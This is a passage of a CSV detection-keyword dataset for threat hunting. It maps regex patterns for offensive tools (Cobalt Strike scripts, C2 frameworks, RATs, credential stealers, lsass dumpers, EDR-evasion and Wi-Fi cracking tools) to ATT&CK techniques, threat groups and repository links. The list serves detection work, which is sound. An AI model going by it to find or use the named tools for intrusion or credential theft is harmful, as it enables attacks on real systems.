Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*aggressor.cna*",".{0,1000}aggressor\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*aggressor.dialog*",".{0,1000}aggressor\.dialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*aggressor.println*",".{0,1000}aggressor\.println.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*aggressor.py*",".{0,1000}aggressor\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*Aggressor/TikiTorch*",".{0,1000}Aggressor\/TikiTorch.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*AggressorScripts*",".{0,1000}AggressorScripts.{0,1000}","offensive_tool_keyword","AggressorScripts-1","Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/AggressorScripts-1","1","1","N/A","N/A","1","2","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z" "*aggressor-scripts*",".{0,1000}aggressor\-scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z" "*Aggressor-Scripts*",".{0,1000}Aggressor\-Scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*agoakfejjabomempkjlepdflaleeobhb*",".{0,1000}agoakfejjabomempkjlepdflaleeobhb.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*AgUAAAAAAAAAAAAOZG5zLmdvb2dsZS5jb20NL2V4cGVyaW1lbnRhbA*",".{0,1000}AgUAAAAAAAAAAAAOZG5zLmdvb2dsZS5jb20NL2V4cGVyaW1lbnRhbA.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*ahmedkhlief/Ninja*",".{0,1000}ahmedkhlief\/Ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*ahmedkhlief/Ninja*",".{0,1000}ahmedkhlief\/Ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*AhMyth-Android-RAT*",".{0,1000}AhMyth\-Android\-RAT.{0,1000}","offensive_tool_keyword","AhMyth-Android-RAT","AhMyth Android Rat","T1020 - T1071 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/AhMyth/AhMyth-Android-RAT","1","0","N/A","N/A","10","4223","1660","2021-08-12T21:23:08Z","2017-07-07T03:03:37Z" "*aholpfdialjgjfhomihkjbmgjidlcdno*",".{0,1000}aholpfdialjgjfhomihkjbmgjidlcdno.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*ahsten.run \*powershell.exe*",".{0,1000}ahsten\.run\s\\.{0,1000}powershell\.exe.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*aiifbnbfobpmeekipheeijimdpnlpgpp*",".{0,1000}aiifbnbfobpmeekipheeijimdpnlpgpp.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*aiocmd\nested_completer.py*",".{0,1000}aiocmd\\nested_completer\.py.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*Airbash*",".{0,1000}Airbash.{0,1000}","offensive_tool_keyword","Airbash","A POSIX-compliant fully automated WPA PSK handshake capture script aimed at penetration testing.","T1565 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/tehw0lf/airbash","1","0","N/A","N/A","4","344","65","2021-10-26T09:47:34Z","2018-04-18T23:50:15Z" "*Aircrack-ng*",".{0,1000}Aircrack\-ng.{0,1000}","offensive_tool_keyword","aircrack-ng","WiFi security auditing tools suite.","T1110 - T1170 - T1180 - T1201 - T1213","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","10","4813","871","2024-05-01T12:54:30Z","2018-03-10T17:11:11Z" "*aircrack-ng*",".{0,1000}aircrack\-ng.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*aireplay-ng *",".{0,1000}aireplay\-ng\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*aireplay-ng *",".{0,1000}aireplay\-ng\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Airgeddon*",".{0,1000}Airgeddon.{0,1000}","offensive_tool_keyword","Airgeddon","This is a multi-use bash script for Linux systems to audit wireless networks.","T1590 - T1533 - T1170 - T1583.001","TA0002 - TA0003 - ","N/A","N/A","Network Exploitation tools","https://github.com/v1s1t0r1sh3r3/airgeddon","1","0","N/A","N/A","10","6029","1136","2024-04-12T05:12:20Z","2016-03-18T10:34:56Z" "*airman604/splunk_whisperer*",".{0,1000}airman604\/splunk_whisperer.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*airmon-ng*",".{0,1000}airmon\-ng.{0,1000}","offensive_tool_keyword","airmon-ng","This script can be used to enable monitor mode on wireless interfaces. It may also be used to kill network managers or go back from monitor mode to managed mode","T1018 - T1040","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.aircrack-ng.org/doku.php?id=airmon-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*airodump-ng *",".{0,1000}airodump\-ng\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*airpwn-ng*",".{0,1000}airpwn\-ng.{0,1000}","offensive_tool_keyword","airpwn-ng","We force the targets browser to do what we want","T1562 - T1564 - T1565 - T1566 - T1567 - T1573","TA0005 - TA0007 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/ICSec/airpwn-ng","1","1","N/A","N/A","1","32","12","2022-11-07T02:22:34Z","2021-07-20T03:43:13Z" "*aix2john.pl*",".{0,1000}aix2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*aix2john.py*",".{0,1000}aix2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ajpc500/BOFs*",".{0,1000}ajpc500\/BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*akamai/DDSpoof*",".{0,1000}akamai\/DDSpoof.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*akuafif/hXOR-Packer*",".{0,1000}akuafif\/hXOR\-Packer.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*AlanFramework.git*",".{0,1000}AlanFramework\.git.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*Alcatraz.sln*",".{0,1000}Alcatraz\.sln.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*Alcatraz.vcxproj*",".{0,1000}Alcatraz\.vcxproj.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*Alcatraz/obfuscator*",".{0,1000}Alcatraz\/obfuscator.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*Alcatraz-master.zip*",".{0,1000}Alcatraz\-master\.zip.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*AlessandroZ/BeRoot*",".{0,1000}AlessandroZ\/BeRoot.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*AlessandroZ/LaZagne*",".{0,1000}AlessandroZ\/LaZagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*alexa-top-20000-sites.txt*",".{0,1000}alexa\-top\-20000\-sites\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*alex-sector/dns2tcp*",".{0,1000}alex\-sector\/dns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*al-khaser*",".{0,1000}al\-khaser.{0,1000}","offensive_tool_keyword","al-khaser","al-khaser is a PoC malware application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar","T1055 - T1117 - T1218 - T1003 - T1552","TA0002 - TA0008 - TA0006","N/A","N/A","Exploitation tools","https://github.com/LordNoteworthy/al-khaser","1","0","N/A","N/A","10","5532","1133","2024-03-18T21:51:23Z","2015-11-12T18:35:16Z" "*---All Azure AD User Principal Names---*",".{0,1000}\-\-\-All\sAzure\sAD\sUser\sPrincipal\sNames\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*All Done! Hack the planet!*",".{0,1000}All\sDone!\sHack\sthe\splanet!.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*All EDR drivers were successfully removed from Kernel callbacks!*",".{0,1000}All\sEDR\sdrivers\swere\ssuccessfully\sremoved\sfrom\sKernel\scallbacks!.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*All good in the hood. Check Temp for test.txt*",".{0,1000}All\sgood\sin\sthe\shood\.\sCheck\sTemp\sfor\stest\.txt.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*All_SubdomainTOP_Seclist.txt*",".{0,1000}All_SubdomainTOP_Seclist\.txt.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "*Allocated shellcode memory in the target process: *",".{0,1000}Allocated\sshellcode\smemory\sin\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*Allocated shellcode memory in the target process: *",".{0,1000}Allocated\sshellcode\smemory\sin\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*Allow Multiple RDP (Remote 